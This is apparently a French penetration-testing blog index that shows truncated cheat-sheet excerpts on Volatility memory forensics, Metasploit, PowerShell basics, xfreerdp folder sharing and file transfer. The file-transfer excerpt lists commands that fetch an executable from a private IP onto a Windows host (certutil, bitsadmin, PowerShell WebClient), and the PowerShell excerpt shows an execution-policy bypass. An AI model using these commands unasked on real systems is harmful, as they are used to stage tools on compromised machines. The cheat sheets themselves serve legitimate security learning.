Aide-Mémoire volatility

volatility utilise python2 git clone https://github.com/volatilityfoundation/volatility.git python2 -m pip install pycrypto python2 -m pip install distorm3 python2 vol.py Si on a un image mémoire inconnu volatility -f Win7-Jigsaw.raw imageinfo on regarde Suggested Profile(s) Liste les processsus volatility -f Win7-Jigsaw.raw –profile=Win7SP1x64 pslist Liste les dll utilisés par un processus volatility -f Win7-Jigsaw.raw –profile=Win7SP1x64 dlllist -p 3704 … Continuer la lecture

Bash script utile

Remplacer une chaîne de caractères dans plusieurs fichiers simultanément find ./ -type f -print0 | xargs -0 sed -i "s/\$base64binary/\$encodedbinary/g" #remplace $base64binary par $encodedbinary

Quelques commandes de metasploit

Metasploit est une plateforme complète pour l’exploitation de cibles fonctionnant sur une multitude de plateformes. Tout le monde le sait. Mais metasploit peut faire beaucoup plus. Création de rapports de vulnérabilités Recherche de vulnérabilités dans un service spécifique dans un réseau entier Création d’espace de travail(workspace) pour différents projets(clients) Enregistrement dans la base de données … Continuer la lecture

Transfert de fichiers

Avec Windows powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe ” certutil -urlcache -f http://192.168.1.2/putty.exe putty.exe bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe C:\Temp\putty.exe curl http://192.168.1.2/putty.exe -o putty.exe wget http://192.168.1.2/putty.exe -OutFile putty.exe powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://192.168.1.2/putty.exe’, ‘putty.exe’) impacket-smbserver share $(pwd) -smb2support tftp use auxiliary/server/tftp set srvhost 10.9.0.24 set tftproot /home/r0cker exploit tftp -i 192.168.1.2 GET file.txt #sur l<ordinateur de la … Continuer la lecture

Aide sur les commandes principales de Powershell

powershell -ExecutionPolicy Bypass -File .\myscript.ps1 Get-Help Command-Name Get-Help Get-Command -Examples Get-Command Verb-* ou Get-Command *-Noun #recherche de cmdlets Manipulation d’objets le Pipe permet de passer un objet à un autre cmdlet Verb-Noun | Get-Member ex. Get-Command | Get-Member -MemberType Method #retrouve les méthodes d’une cmdlet ex. (Get-Command Get-ChildItem).Parameter #retrouve les paramètres d’une cmdlet Get-ChildItem | … Continuer la lecture

Paramètres xfreerdp pour partage d’un dossier local

Options pour xfreerdp /dynamic-resolution — permet d’ajuster la taille de la fenêtre, ajustant la résolution de la cible. /size:WIDTHxHEIGHT — règle une taille spécifique dans le cas où la celle-ci n’est pas ajustée automatiquement avec l’option /dynamic-resolution +clipboard — active le support pour le clipboard /drive:LOCAL_DIRECTORY,SHARE_NAME — créer un dossier partagé. Pour partager le dossier … Continuer la lecture